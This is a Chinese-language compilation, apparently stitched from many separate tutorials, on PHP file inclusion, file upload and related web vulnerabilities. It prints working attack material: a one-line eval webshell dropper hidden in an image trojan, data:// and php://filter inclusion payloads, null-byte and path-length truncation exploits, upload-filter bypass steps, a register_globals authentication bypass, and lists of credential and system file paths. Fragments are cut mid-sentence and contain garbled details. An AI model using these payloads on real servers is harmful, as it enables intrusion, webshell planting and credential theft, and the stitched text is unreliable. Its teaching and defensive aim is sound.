PHP文件包含漏洞详解

⽂件包含漏洞⽂件包含漏洞原理：⽂件包含漏洞是渗透测试过程中⽤的⽐较多的⼀个漏洞，主要⽤来绕过上传⽊马⽂件。

程序开发⼈员通常会把可重复使⽤的函数写到单个⽂件中，在使⽤某种函数时，直接调⽤此⽂件，⽽⽆需再次编写，这种调⽤⽂件的过程⼀般称为包含。

PHP包含：PHP中⽂件包含函数有以下四种:require()：函数出现错误的时候，会直接报错并退出程序的执⾏require_once()：同require（），区别在于重复调⽤同⼀⽂件时，程序只调⽤⼀次include()：在包含的过程中如果出现错误，会抛出警告，程序继续正常运⾏include_once()：同include（），区别在于重复调⽤同⼀⽂件时，程序只调⽤⼀次漏洞产⽣原因：⽂件包含函数加载的参数没有经过过滤或者严格的定义，可以被⽤户控制，包含其他恶意⽂件，导致了⾮预期的代码。

⽰例代码<?php$filename=$_GET['filename'];include($filename);>$_GET['filename']参数开发者没有经过严格的过滤，直接带⼊了include的函数，攻击者可以修改$_GET['filename']的值，执⾏⾮预期的操作。

常见的敏感信息路径：windows系统c:\boot.ini //查看系统版本c:\windows\system32\inetsrv\MetaBase.xml //IIs配置⽂件c:\windows\repair\sam //存储windows系统初次安装的密码c:\ProgramFiles\mysql\my.ini //Mysql配置c:\ProgramFiles\mysql\data\mysql\user.MYD MySQL root密码c:\windows\php.ini //php配置信息Linux/Unix系统/etc/password //账户信息/etc/shadow //账户密码⽂件/usr/local/app/apache2/conf/httpd.conf //Apache2默认配置⽂件/usr/local/app/apache2/conf/extra/httpd-vhost.conf //虚拟⽹站配置/usr/local/app/php5/lib/php.ini //PHP相关配置/etc/httpd/conf/httpd.conf //Apache配置⽂件/etc/my.conf //mysql配置⽂件⽂件包含漏洞危害：配合⽂件上传漏洞GetShell可以配置任意脚本代码⽹站源码⽂件以及配置⽂件泄露远程包含GetShell控制整个⽹站甚⾄是服务器⽂件包含漏洞分为本地和远程⽂件包含：本地⽂件包含漏洞利⽤：上传图⽚马，包含图⽚马GetShell读取⽹站源码以及配置⽂件包含⽇志⽂件GetShell本地⽂件包含绕过和利⽤：包含上传图⽚马%00截断路径长度截断读服务器本地⽂件读⽹站源码⽂件包含⽇志⽂件GetShell远程⽂件包含利⽤：修复办法：php中使⽤open_basedir配置限制访问在指定的区域过滤. / |禁⽌服务器远程包含（allow_url_fopen,allow_url_include,off)严格判断包含中的参数是否外部可控，因为⽂件包含漏洞利⽤成功与否的关键点就在于被包含的⽂件是否可以被外部控制路径限制：限制被包含的⽂件只能在某⼀⽂件夹内，⼀定要禁⽌⽬录跳转字符，如：“../"包含⽂件验证：验证被包含的⽂件是否是⽩名单的⼀员；尽量不要使⽤动态包含，可以在需要包含的页⾯固定写好，如include("head.php");。

PHP网站常见的安全漏洞PHP网站常见的安全漏洞目前PHP网站常见的漏洞有五种，分别是Session文件漏洞、SQL注入漏洞、脚本命令执行漏洞、全局变量漏洞和文件漏洞。

下面为大家简单介绍一些。

1、session文件漏洞Session攻击是黑客最常用到的攻击手段之一。

当一个用户访问某一个网站时，为了免客户每进人一个页面都要输人账号和密码，PHP 设置了Session和Cookie用于方便用户的使用和访向。

2、SQL注入漏洞在进行网站开发的时候，程序员由于对用户输人数据缺乏全面判断或者过滤不严导致服务器执行一些恶意信息，比如用户信息查询等。

黑客可以根据恶意程序返回的结果获取相应的信息。

这就是月行胃的SQL注入漏洞。

3、脚本执行漏洞脚本执行漏洞常见的`原因是由于程序员在开发网站时对用户提交的URL参数过滤较少引起的，用户提交的URL可能包含恶意代码导致跨站脚本攻击。

脚本执行漏洞在以前的PHP网站中经常存在，但是随着PHP版本的升级，这些间题已经减少或者不存在了。

4、全局变量漏洞PHP中的变量在使用的时候不像其他开发语言那样需要事先声明，PHP中的变量可以不经声明就直接使用，使用的时候系统自动创建，而且也不需要对变量类型进行说明，系统会自动根据上下文环境自动确定变量类型。

这种方式可以大大减少程序员编程中出错的概率，使用起来非常的方便。

5、文件漏洞文件漏洞通常是由于网站开发者在进行网站设计时对外部提供的数据缺乏充分的过滤导致黑客利用其中的漏洞在Web进程上执行相应的命令。

假如在lsm.php中包含这样一段代码:include($b.”/aaa.php”.)，这对黑客来说，可以通过变量$b来实现远程攻击，可以是黑客自已的代码，用来实现对网站的攻击。

可以向服务器提交 a.php include=http://lZ7.0.0. 1/b.php,然后执行b.php的指令。

下载全文。

php⽂件包含伪协议⽂件上传漏洞相关说明1.上传⽂件过滤了后缀名和MIME类型，$_FILES['pic']['type']是由浏览器传输的⽂件类型决定，但是mime_content_type()是由php 内置⽅法判断⽂件类型；⽀持⽂件类型为application/zip,⽀持上传zip压缩⽂件，后缀名还是要改成.jpg或.gif,上传后将该名为随机数字(1499394959).jpg格式$name1=substr($name,-4);if(($name1!==".gif") and ($name1!==".jpg")){echo "<script language=javascript>alert('上传照⽚只能是JPG或者GIF！');history.go(-1)</script>";exit;}if(mime_content_type($tmpName)!=="image/jpeg"&&mime_content_type($tmpName)!=="image/gif"&&mime_content_type($tmpName)!=="application/zip") {echo mime_content_type($tmpName);echo "<script language=javascript>alert('上传照⽚只能是JPG或者GIF！');history.go(-1)</script>";exit;}2.任意⽂件包含$f = $_GET['f'];include_once('sys/config.php');include($f);利⽤zip或phar伪协议读取压缩包中的⽂件/about.php?f=phar://./images/1499394959.jpg/1.php/about.php?f=zip://./images/1499394959.jpg%231.php上传webshell完成扩展：php伪协议：file:// — 访问本地⽂件系统http:// — 访问 HTTP(s) ⽹址ftp:// — 访问 FTP(s) URLsphp:// — 访问各个输⼊/输出流（I/O streams）zlib:// — 压缩流data:// — 数据（RFC 2397）glob:// — 查找匹配的⽂件路径模式phar:// — PHP 归档ssh2:// — Secure Shell 2rar:// — RARogg:// — ⾳频流expect:// — 处理交互式的流。

文件包含漏洞的利用及防御方案作者美创科技安全实验室01、漏洞介绍文件包含漏洞是代码注入的一种。

其原理就是注入一段用户能控制的脚本或代码，并让服务器端执行，代码注入的典型代表就是文件包含Fileinclusion。

文件包含可能会出现在jsp、php、asp等语言中。

服务器通过函数去包含任意文件时，由于要包含的这个文件来源过滤不严，从而可以去包含一个恶意文件，而我们可以构造这个恶意文件来达到邪恶的目的。

常见的文件包含的函数如下：PHP：include()、include_once()、require()、require_once()、fopen()、readfile()JSP/Servlet：ava.io.file()、java.io.filereader()ASP：include file、include virtual02、文件包含漏洞的分类文件包含可以分为本地文件包含和远程文件包含两种。

顾名思义，本地文件包含就是通过URL将服务器本地的其他文件include进来。

远程文件包含就是将远程服务器的文件include进来。

最主要的是，包含进来的文件都以当前脚本文件解析，比如，当前测试系统是Apache加php环境，那么被include进来的文件，不管是什么类型，比如说图片，文本文档，这些文件被包含以后，都会被当做php脚本来解析。

03、文件包含漏洞的危害①执行任意代码②读取文件源码或敏感信息。

③包含恶意文件控制网站，甚至控制服务器。

04、文件包含漏洞漏洞复现利用DVWA靶场进行CSRF漏洞演练：1.Low Security Level查看源码：服务器获取page的值，没有进行任何过滤。

因此直接读取C:\Users\dell\Desktop\1.txt文件。

若文件中存在php代码，<?php phpinfo();?>，则会执行php代码并返回代码执行的结果。

还可以进行远程文件包含，如下：2.Medium Security Level查看源码：Medium等级的代码将'http://','https://','../','..\'都替换为空，防御了简单的远程和本地包含。

文件包含漏洞的原理(一)文件包含漏洞什么是文件包含漏洞文件包含漏洞（File Inclusion Vulnerability）是一种安全漏洞，存在于很多动态网页编程语言中的文件包含函数中，如PHP的include()或require()函数。

攻击者可通过构造恶意请求，导致服务器加载并执行攻击者指定的文件，从而导致服务器遭受各种安全威胁。

原理解析文件包含漏洞的原理实际上是由于开发者未对用户输入进行充分过滤和验证，将用户输入直接作为文件路径或者参数传递给文件包含函数。

攻击者可以利用这个漏洞，通过构造特定的请求，来执行任意文件的代码。

1. 本地文件包含本地文件包含漏洞发生在当某个参数直接被用于引用本地文件的情况下。

攻击者可以通过指定特定的文件路径，让服务器加载攻击者所需要的文件。

攻击者可以利用本地文件包含漏洞获取敏感信息、执行恶意代码等。

2. 远程文件包含远程文件包含漏洞则是指通过远程服务器上的文件，来执行代码。

攻击者通过构造特定的请求，将恶意文件的URL传递给文件包含函数，服务器会从远程服务器获取对应的文件内容并执行。

攻击者可以利用此漏洞执行恶意代码、操纵服务器等。

如何防范文件包含漏洞要有效防止文件包含漏洞的发生，开发人员需要采取一系列的防范措施。

1. 输入验证和过滤开发者应该对用户输入进行严格的验证和过滤。

对于文件路径参数，应该使用白名单或可信列表，限定可能的文件路径。

对于用户输入参数，应该进行输入过滤、转义或编码，确保输入不会被当作代码执行。

2. 避免使用用户输入拼接路径开发者应该尽量避免使用用户输入来拼接文件路径。

最好使用绝对路径或者相对于程序根目录的路径来引用文件。

3. 使用安全的文件包含函数一些编程语言提供了更安全的文件包含函数，如PHP中的include_once()和require_once()，可以避免重复包含文件，并提供了一定的安全性。

4. 文件权限和访问控制设置文件和目录的权限，确保只有授权的用户可以访问特定文件，限制对敏感文件的访问。

PHP反序列化漏洞详解（魔术⽅法）⽂章⽬录⼀、PHP⾯向对象编程在⾯向对象的程序设计(Object-oriented programming，OOP)中，对象是⼀个由信息及对信息进⾏处理的描述所组成的整体，是对现实世界的抽象。

类是⼀个共享相同结构和⾏为的对象的集合。

每个类的定义都以关键字class开头，后⾯跟着类的名字。

创建⼀个PHP类：<?phpclass TestClass //定义⼀个类{//⼀个变量public $variable = 'This is a string';//⼀个⽅法public function PrintVariable(){echo $this->variable;}}//创建⼀个对象$object = new TestClass();//调⽤⼀个⽅法$object->PrintVariable();>public、protected、privatePHP 对属性或⽅法的访问控制，是通过在前⾯添加关键字 public（公有），protected（受保护）或 private（私有）来实现的。

public（公有）：公有的类成员可以在任何地⽅被访问。

protected（受保护）：受保护的类成员则可以被其⾃⾝以及其⼦类和⽗类访问。

private（私有）：私有的类成员则只能被其定义所在的类访问。

注意：不同修饰符序列化后的值不⼀样访问控制修饰符的不同，序列化后属性的长度和属性值会有所不同，如下所⽰：public：属性被序列化的时候属性值会变成属性名protected：属性被序列化的时候属性值会变成\x00*\x00属性名private：属性被序列化的时候属性值会变成\x00类名\x00属性名其中：\x00表⽰空字符，但是还是占⽤⼀个字符位置魔术⽅法（magic函数）PHP中把以两个下划线__开头的⽅法称为魔术⽅法(Magic methods)类可能会包含⼀些特殊的函数：magic函数，这些函数在某些情况下会⾃动调⽤。

论PHP 常见的漏洞WooYun 知识库首先拿到一份源码 肯定是先install 上。

而在安装文件上又会经常出现问题。

一般的安装文件在安装完成后 基本上都不会自动删除这个安装的文件 我遇到过的会自动删除的好像也就qibocms 了。

其他的基本都是通过生成一个lock 文件 来判断程序是否安装过了 如果存在这个lock 文件了 就会退出了。

这里首先 先来说一下安装文件经常出现的问题。

根本无验证。

这种的虽然不多 但是有时还是会遇到个。

在安装完成后 并不会自动删除文件 又不会生成lock 来判断是否安装过了。

导致了可以直接重装过例子: WooYun: PHPSHE B2C 重装。

安装file因为install 一般都会有step 步骤啥的。

Step 1 check 啥啥 step 2 是安装啥的。

而一些cms 默认step 是1 而step 又是GET 来的 而他check lock 的时候就是在step1里面。

这时候如果我们直接用GET 提交step 2 那么就直接进入下一步了 就没check lock 了。

例如某cms 中的安装文件1 2 3 4 5 6 7 8 9 if (empty ($step)){$step = 1;//当用户没有提交step 的时候 赋值为1}require_once ("includes/inc_install.php");$gototime = 2000;/*------------------------显示协议文件------------------------*/10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 if ($step == 1) //当1才检测lock{if (file_exists('installed.txt')){echo '<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/></head><body>你已经安装过该系统，如果想重新安装，请先删除install 目录下的 installed.txt 文件，然后再安装。

⽂件包含——本地⽂件包含和远程⽂件包含⽂件包含漏洞的出现及危害⽂件包含漏洞是⼀种最常见的漏洞类型，它会影响依赖于脚本运⾏时的web应⽤程序。

当应⽤程序使⽤攻击者控制的变量构建可执⾏代码的路径时，⽂件包含漏洞会导致攻击者任意控制运⾏时执⾏的⽂件。

如果⼀个⽂件包含这个漏洞，为了⽅便起见，经常在开发阶段就实施。

由于它经常⽤于程序开发阶段，所以这就为后来的攻击埋下了伏笔并导致了各种基于⽂件的攻击。

⽂件包含漏洞主要是程序员把⼀些公⽤的代码写在⼀个单独的⽂件中，然后使⽤其他⽂件进⾏包含调⽤，如果需要包含的⽂件使⽤硬编码，⼀般是不会出现安全问题，但是有时可能不确定需要包含哪些具体⽂件，所以就会采⽤变量的形式来传递需要包含的⽂件，但是在使⽤包含⽂件的过程中，未对包含的变量进⾏检查及过滤，导致外部提交的恶意数据作为变量进⼊到了⽂件包含的过程中，从⽽导致提交的恶意数据被执⾏。

⽂件包含漏洞分为本地⽂件包含(Loacl File Inclusion,LFI)和远程⽂件包含(Remote File Inclusion,RFI)。

这种漏洞貌不惊⼈，却危害很⼤。

通过⽂件包含漏洞，可以读取系统中的敏感⽂件，源代码⽂件等，如密码⽂件，通过对密码⽂件进⾏暴⼒破解。

若破解成功则可获取操作系统的⽤户账户，甚⾄可通过开放的远程连接服务进⾏连接控制。

另外不管是本地⽂件包含还是远程⽂件包含，⽂件包含漏洞还可能导致执⾏任意代码。

本地⽂件包含本地⽂件包含就是通过浏览器包含web服务器上的⽂件，这种漏洞是因为浏览器包含⽂件时没有进⾏严格的过滤允许遍历⽬录的字符注⼊浏览器并执⾏。

⾸先，当值可以直接被控制时，你就会有⼀个⾮常类似的如下的代码⽚段。

<? php $ file = $ _GET ['file']; include ($ file);如果你可以找到上⾯的代码，那么就有⼀个直接包含的$⽂件，你可以控制它。

请注意：该⽂件可以是任何类型，⽆论它是被删除的⽂件类型、图⽚还是任意的内容，都包括在内。

⽂件上传漏洞详解0x01 上传漏洞定义⽂件上传漏洞是指⽤户上传了⼀个可执⾏的脚本⽂件，并通过此脚本⽂件获得了执⾏服务器端命令的能⼒。

这种攻击⽅式是最为直接和有效的，“⽂件上传”本⾝没有问题，有问题的是⽂件上传后，服务器怎么处理、解释⽂件。

如果服务器的处理逻辑做的不够安全，则会导致严重的后果.0x02 上传漏洞危害1.上传⽂件是Web脚本语⾔，服务器的Web容器解释并执⾏了⽤户上传的脚本，导致代码执⾏。

2.上传⽂件是病毒或者⽊马时，主要⽤于诱骗⽤户或者管理员下载执⾏或者直接⾃动运⾏；3.上传⽂件是Flash的策略⽂件crossdomain.xml，⿊客⽤以控制Flash在该域下的⾏为(其他通过类似⽅式控制策略⽂件的情况类似);4.上传⽂件是病毒、⽊马⽂件，⿊客⽤以诱骗⽤户或者管理员下载执⾏。

5.上传⽂件是钓鱼图⽚或为包含了脚本的图⽚，在某些版本的浏览器中会被作为脚本执⾏，被⽤于钓鱼和欺诈。

除此之外，还有⼀些不常见的利⽤⽅法，⽐如将上传⽂件作为⼀个⼊⼝，溢出服务器的后台处理程序，如图⽚解析模块;或者上传⼀个合法的⽂本⽂件，其内容包含了PHP脚本，再通过"本地⽂件包含漏洞(Local File Include)"执⾏此脚本;等等。

0x03 上传漏洞满⾜条件⾸先，上传的⽂件能够被Web容器解释执⾏。

所以⽂件上传后所在的⽬录要是Web容器所覆盖到的路径。

其次，⽤户能够从Web上访问这个⽂件。

如果⽂件上传了，但⽤户⽆法通过Web访问，或者⽆法得到Web容器解释这个脚本，那么也不能称之为漏洞。

最后，⽤户上传的⽂件若被安全检查、格式化、图⽚压缩等功能改变了内容，则也可能导致攻击不成功。

0x04 上传漏洞产⽣的原因⼀些web应⽤程序中允许上传图⽚，⽂本或者其他资源到指定的位置，⽂件上传漏洞就是利⽤这些可以上传的地⽅将恶意代码植⼊到服务器中，再通过url去访问以执⾏代码.造成⽂件上传漏洞的原因是:1.服务器配置不当2.开源编辑器上传漏洞3.本地⽂件上传限制被绕过4.过滤不严或被绕过5.⽂件解析漏洞导致⽂件执⾏6.⽂件路径截断0x05 上传漏洞的原理⼤部分的⽹站和应⽤系统都有上传功能，⼀些⽂件上传功能实现代码没有严格限制⽤户上传的⽂件后缀以及⽂件类型，导致允许攻击者向某个可通过Web访问的⽬录上传任意PHP⽂件，并能够将这些⽂件传递给PHP解释器，就可以在远程服务器上执⾏任意PHP脚本。

PHP伪协议与⽂件包含漏洞1 PHP⽂件包含漏洞花样繁多，需配合代码审计。

看能否使⽤这类漏洞时，主要看： （1）代码中是否有include(),且参数可控； 如： （2）php.ini设置：确保 allow_url_fopen=1, allow_url_include=1; 确定了使⽤的参数之后，就可以开始⽤伪协议了。

1. data://text/plain 伪协议 可以执⾏任何代码；需要fopen和include全部打开。

⽤法⽰例1：?page=data://text/plain,<?php phpinfo(); ?> ⽤法⽰例2：?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg== 注：经过base64编码后的加号和等号最好⼿动将其换成url编码形式，以免识别不了。

（ =[%3d]; +[%2b] ）2.php://input 伪协议 可以将post请求中的数据作为php代码执⾏；只需要include打开。

⽤法⽰例：(抓包，在get参数后输⼊伪协议，在post区域输⼊php代码。

）3.php://filter 伪协议 读取⽂件源代码；只需要fopen打开；⼀般在知晓⽹站路径的情况下使⽤。

⽤法⽰例：?page=php://filter/read=convert.base64-encode/resource=learn.php 这样，其返回的就是learn.php base64加密后的代码内容。

此处learn.php与漏洞⽂件在同⼀⽬录下；否则，还要写相对路径的。

（我在测试时，稍微改动⼀下这个语句，它的效果就变成执⾏learn.php了；原理和更多⽤法还待探究。

）将参数改为post后，data和php://filter还可使⽤，php://input失效。

php安全攻防利⽤⽂件上传漏洞与绕过技巧详解⽬录前⾔⽂件上传漏洞的⼀些场景场景⼀：前端js代码⽩名单判断.jpg|.png|.gif后缀场景⼆：后端PHP代码检查Content-type字段场景三：代码⿊名单判断.asp|.aspx|.php|.jsp后缀场景四：代码扩⼤⿊名单判断绕过⽅式——htaccsess：绕过⽅式——⼤⼩写绕过：场景五：⼀些复合判断空格、点绕过(windows)::$DATA绕过(windows)双写绕过%00截断%0a绕过图⽚马绕过⼆次渲染绕过条件竞争/.绕过前⾔⽂件上传漏洞⼤多出现在可以进⾏⽂件上传的地⽅，如⽤户头像上传，⽂档上传处等。

该漏洞是⼀个危害⼗分⼤的漏洞，通过⽂件上传，攻击者可以上传webshell并进⾏getshell操作，从⽽获得系统shell，可执⾏任意命令。

也为后续⼤型⽊马的上传，特权提升提供了⼀个良好的基础。

⽂件上传漏洞的⼀些场景接下来针对⽂件上传漏洞的⼀些waf过滤的场景进⾏说明并进⾏绕过和利⽤。

场景⼀：前端js代码⽩名单判断.jpg|.png|.gif后缀在该场景下，防御的姿势是通过js代码对上传的⽂件后缀进⾏判断，如果不是.jpg|.png|.gif这三个后缀的⽂件则不允许上传⾄后台绕过⽅式：将带有⼀句话⽊马的⽂件后缀名改为xxx.jpg|png|gif,在上传处通过BurpSuite进⾏包拦截并改包，将⽂件后缀名改为php|jsp等脚本的后缀。

上传成功后访问该⽂件的路径即可getshell。

场景⼆：后端PHP代码检查Content-type字段在该场景下，防御的姿势是通过js代码对上传⽂件请求的Content-type字段进⾏检查，如果不是image/jpeg则不允许上传⾄后台绕过⽅式：将上传⼀句话⽊马⽂件的request包进⾏拦截，添加或修改Content-type字段为image/jpeg场景三：代码⿊名单判断.asp|.aspx|.php|.jsp后缀在该场景下，防御姿势是通过后台代码对上传的⽂件后缀进⾏判断，如果是.asp|.aspx|.php|.jsp这四个后缀的⽂件则不允许上传绕过⽅式：当apache的配置⽂件httpd.conf中存在如下配置时：AddType application/x-httpd-php .php .phtml .phps .php5 .pht说明可以通过上传.phtml|.phps|.php5|.pht这些后缀名的⽂件，且他们都会被解析称后缀为.php的⽂件。

一、CTF Web常见题型简介CTF(Web)是由网络安全爱好者组织的一场网络安全技术竞赛，旨在提高参赛者在网络安全领域的技术水平。

在CTF(Web)比赛中，php常常被用作一种常见的Web开发语言，因此掌握php题型对于CTF比赛至关重要。

php题型包括一系列利用php语言漏洞的题目，通过发现和利用php漏洞来获取关键信息，如flag等，以此来评判参赛者的php漏洞攻防能力。

二、CTF Web常见php题型1. 文件包含漏洞（LFI/RFI）文件包含漏洞是php题型中常见的一种漏洞类型。

该漏洞利用了php 中的文件包含函数来实现，通过精心构造的文件路径，可以让程序读取服务器上的任意文件，进而获取敏感信息。

2. SQL注入php题型中的SQL注入漏洞是指利用未对输入进行过滤和检查的php 代码，向数据库中注入恶意SQL语句，进而实现对数据库的攻击。

通过SQL注入漏洞，攻击者可以获取用户敏感信息，如用户名、密码等。

3. 命令注入php题型中的命令注入漏洞是指利用未进行输入检查的php代码，向系统中注入恶意命令，进而实现对系统的攻击。

通过命令注入漏洞，攻击者可以获取系统敏感信息，如系统文件、密码等。

4. 文件上传漏洞php题型中的文件上传漏洞是指利用未进行文件类型和大小检查的php代码，实现对服务器的文件上传。

通过文件上传漏洞，攻击者可以上传恶意文件到服务器，实现对服务器的攻击和控制。

5. XSS跨站脚本攻击php题型中的XSS跨站脚本攻击是指攻击者通过在Web页面中植入恶意脚本代码，来获取用户的敏感信息。

利用XSS漏洞，攻击者可以窃取用户的cookie等关键信息。

6. 文件读取漏洞php题型中的文件读取漏洞是指通过未进行权限控制的php代码，实现对服务器上文件的读取操作。

通过文件读取漏洞，攻击者可以获取服务器上的敏感文件信息，如配置文件等。

7. 逻辑漏洞php题型中的逻辑漏洞是指程序设计上的逻辑错误，通过合理的条件判断和逻辑推导，绕过程序的限制，实现对程序的攻击。

⽂件包含漏洞详解1、⽂件包含漏洞简介 ⽂件包含漏洞是“代码注⼊”的⼀种，其原理就是注⼊⼀段⽤户能控制的脚本或者代码，并让服务器执⾏。

2、常见的⽂件包含的函数 PHP：include()，include_once，require()，require_once()，fopen()，readfile()... JSP/Servlet：ava.io.File()，java.io.FileReader()... ASP：include file，inclede virtual...3、⽂件包含漏洞分类 本地⽂件包含：包含⽹站服务器上的⽂件 远程⽂件包含：包含别的（⾃⼰）服务器上的⽂件4、演⽰准备⼀张 jpg格式的图⽚，不能太⼤，保存为 1.jpg新建⼀个⽂本⽂档，写⼊<?fputs(fopen("shell20.php","w"),'<?php @eval($_POST[pass]);?>')?>，保存为 2.txt使⽤cmd制作⼀个图⽚马：copy 1.jpg/b + 2.php/a 3.jpg【本地⽂件包含】利⽤⽂件上传漏洞，把⽂件 3.jpg 上传到服务器使⽤⽂件包含漏洞，执⾏ 3.jpg（包含的图⽚不能太⼤）会⽣成⼀个 shell20.php 的⼀句话⽊马⽂件，使⽤蚁剑进⾏连接【远程⽂件包含】在⾃⼰的服务器上写⼀个图⽚马，然后⽤⽬标⽹站的⽂件包含漏洞包含⾃⼰服务器上的图⽚马然后和本地⽂件包含⼀样，在⽬标服务器内⽣成⼀句话⽊马，然后使⽤蚁剑进⾏连接，拿下服务器。

5、PHP 伪协议【file:// 协议】简介：file:// ⽤于访问本地⽂件系统，在CTF中通常⽤来读取本地⽂件的且不受allow_url_fopen与allow_url_include的影响⽤法：file:// [⽂件的绝对路径和⽂件名]php.ini：file:// 协议在双off的情况下也可以正常使⽤；allow_url_fopen ：off/onallow_url_include：off/on简介：php:// 访问各个输⼊/输出流（I/O streams），在CTF中经常使⽤的是php://filter和php://input，php://filter⽤于读取源码，php://input⽤于执⾏php代码。

⽂件包含漏洞今天学习了⼀波⽂件包含漏洞介绍服务器执⾏PHP⽂件时，可以通过⽂件包含函数加载另⼀个⽂件中的PHP代码，并且当PHP来执⾏，这会为开发者节省⼤量的时间。

这意味着您可以创建供所有⽹页引⽤的标准页眉或菜单⽂件。

当页眉需要更新时，您只更新⼀个包含⽂件就可以了，或者当您向⽹站添加⼀张新页⾯时，仅仅需要修改⼀下菜单⽂件（⽽不是更新所有⽹页中的链接）。

php⽂件包含漏洞PHP中的⽂件包含分为本地包含与远程包含，导致⽂件包含的函数如下：include()include_once()require()require_once()fopen()readfile()…本地包含漏洞（LFI）新建⼀个phpinfo.txt，然后新建⼀个shell.php，写⼊：1 <?php2 include("phpinfo.txt");3 ?>　访问shell.php会输出phpinfo页⾯内容，⽆论将扩展名改为什么，都将以php代码执⾏。

如果⽂件不是符合php规则的（即没有写<?php ?>等），则通过include可以直接输出源码。

有限制本地⽂件包含漏洞绕过%00截断条件：magic_quotes_gpc = Off php版本<5.3.4测试代码：<?php$filename = $_GET['filename'];include($filename . ".html");>测试结果：/FI/FI.php?filename=../../../../../../../boot.ini%00路径长度截断条件：windows OS，点号需要长于256；linux OS 长于4096Windows下⽬录最⼤长度为256字节，超出的部分会被丢弃；Linux下⽬录最⼤长度为4096字节，超出的部分会被丢弃。

测试代码：1 <?php2$filename = $_GET['filename'];3include($filename . ".html");4 ?>EXP:1 /FI/FI.php?filename=test.txt/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././点号截断条件：windows OS，点号需要长于256测试代码：1 <?php2$filename = $_GET['filename'];3include($filename . ".html");4 ?>EXP:/FI/FI.phpfilename=test.txt........................................................................................................................................................................................................................................................................................................................................................................................................................................................远程包含漏洞前提：需要开启allow_url_fopen，默认关闭。

文件包含漏洞的原理
文件包含漏洞是一种安全漏洞，存在于Web应用程序中，其中可能会使用用户提供的输入作为文件的路径或名称。

攻击者利用文件包含漏洞的原理，通过构造恶意的请求，将恶意文件包含到应用程序的执行环境中，从而能够执行任意的代码。

文件包含漏洞的原理主要基于以下两个方面：
1. 动态文件包含：Web应用程序通常会根据用户提供的输入动态地包含文件。

这个过程如果没有适当的验证和过滤，攻击者可以通过构造恶意的输入来包含任意文件。

例如，攻击者可以通过将”../”（或其它类似的相对路径）添加到用户输入中，来访问应用程序目录之外的文件。

2. 代码执行：当恶意文件被包含到应用程序执行环境中时，攻击者可以控制并利用该环境来执行任意的代码。

这可能导致服务器被入侵、敏感信息被窃取、系统被破坏等后果。

攻击者可以通过包含一个远程恶意文件的URL，或者上传包含恶意代码的文件，来实现代码执行。

总结起来，文件包含漏洞的原理是由于未对用户输入进行适当的验证和过滤，导致攻击者能够构造恶意的输入，将恶意文件包含到应用程序的执行环境中，并执行任意的代码。

为了防止文件包含漏洞，开发人员应该对用户输入进行过滤和验证，以确保输入的安全性。

文件读取漏洞总结概述文件读取漏洞（File Inclusion Vulnerability）是一种常见的Web应用程序漏洞，它可能导致攻击者能够读取目标系统上的敏感文件或系统文件。

这种漏洞通常发生在没有正确过滤用户输入的情况下，攻击者能够通过构造特定的输入来实现任意文件读取。

在本文档中，我们将探讨文件读取漏洞的原理、危害及防范措施。

原理文件读取漏洞的原理在于应用程序没有对用户输入进行充分的校验和过滤。

攻击者可以通过传递恶意的用户输入，构造特定的请求来获取目标系统上的任意文件。

常见的文件读取漏洞类型包括：- 本地文件包含（Local File Inclusion，LFI）：攻击者通过构造含有相对路径或绝对路径的用户输入，让应用程序读取它所不应访问的本地文件。

- 远程文件包含（Remote File Inclusion，RFI）：攻击者通过向目标系统发送恶意链接或请求，远程加载并执行恶意文件。

这种漏洞还可能导致远程代码执行（Remote Code Execution，RCE）漏洞的发生。

危害文件读取漏洞可能导致以下危害： 1. 盗取敏感信息：攻击者可以读取包含敏感数据的文件，如配置文件、数据库凭据等，从而获取关键信息。

2. 文件泄露：攻击者可以读取系统文件或日志文件，了解系统的架构、版本信息等，从而为下一步攻击做准备。

3. 远程执行代码：当应用程序存在远程文件包含漏洞时，攻击者可以加载并执行恶意文件，进而控制服务器执行任意命令。

由于文件读取漏洞的危害性较大，攻击者可能通过这种漏洞发起更高级的攻击，如拒绝服务攻击、命令注入等。

防范措施以下是一些常见的防范措施，用于预防文件读取漏洞的发生： 1. 输入验证与过滤：对用户输入进行严格的验证和过滤，防止恶意文件路径或参数传递给应用程序。

2. 使用白名单：只有在白名单中的文件允许被应用程序读取，其他文件一律禁止访问。

3. 限制访问权限：确保应用程序只能访问必要的系统文件和目录，尽量不要给与过高的权限。

PHP网页的安全性问题针对PHP的网站主要存在下面几种攻击方式:1.命令注入(Command Injection)2.eval注入(Eval Injection)3.客户端脚本攻击(Script Insertion)4.跨网站脚本攻击(Cross Site Scripting, XSS)5.SQL注入攻击(SQL injection)6.跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF)7.Session 会话劫持(Session Hijacking)8.Session 固定攻击(Session Fixation)9.HTTP响应拆分攻击(HTTP Response Splitting)10.文件上传漏洞(File Upload Attack)11.目录穿越漏洞(Directory Traversal)12.远程文件包含攻击(Remote Inclusion)13.动态函数注入攻击(Dynamic Variable Evaluation)14.URL攻击(URL attack)15.表单提交欺骗攻击(Spoofed Form Submissions)16.HTTP请求欺骗攻击(Spoofed HTTP Requests)几个重要的php.ini选项Register Globalsphp>=4.2.0,php.ini的register_globals选项的默认值预设为Off,当register_globals的设定为On时,程序可以接收来自服务器的各种环境变量,包括表单提交的变量,而且由于PHP不必事先初始化变量的值,从而导致很大的安全隐患.例1://check_admin()用于检查当前用户权限,如果是admin设置$is_admin变量为true,然后下面判断此变量是否为true,然后执行管理的一些操作//ex1.php<?phpif (check_admin()){$is_admin = true;}if ($is_admin){do_something();}?>这一段代码没有将$is_admin事先初始化为Flase,如果register_globals为On,那么我们直接提交 /ex1.php?is_admin=true,就可以绕过check_admin()的验证例2://ex2.php<?phpif (isset($_SESSION["username"])){do_something();}else{echo "您尚未登录!";}?>当register_globals=On时,我们提交/ex2.php?_SESSION[username]=dodo,就具有了此用户的权限所以不管register_globals为什么,我们都要记住,对于任何传输的数据要经过仔细验证,变量要初始化safe_mode安全模式,PHP用来限制文档的存取.限制环境变量的存取,控制外部程序的执行.启用安全模式必须设置php.ini中的safe_mode = On1.限制文件存取safe_mode_include_dir = "/path1:/path2:/path3"不同的文件夹用冒号隔开2.限制环境变量的存取safe_mode_allowed_env_vars = 